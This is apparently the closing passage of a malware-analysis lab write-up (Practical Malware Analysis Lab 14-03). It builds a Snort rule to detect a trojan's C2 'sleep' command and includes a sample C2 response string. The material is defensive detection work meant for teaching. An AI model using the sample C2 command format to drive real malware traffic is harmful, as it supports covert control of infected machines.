The final piece of our puzzle is to trigger if a command is sent to sleep. Much like the above we could use something like the below.
<noscript>sefgdgesgfhttp://CYBERAIJU/security/20096'
To get this we will focus on the ‘s’ character followed by any number of numbers between 0 and 20 characters long, closed by our signature 96’
alert tcp $HOME_NET $HTTP_PORTS -> $HOME_NET any (msg:"PMA Lab14-03 C2 sleep command ran"; content:"96'"; pcre:"/\/[s][^\/]*\/[0-9]{0,20}/"; classtype:trojan-activity; sid:1337354; rev:1;)
The end result is our rule being hit after testing as we did above.
This concludes chapter 14, proceed to the next chapter.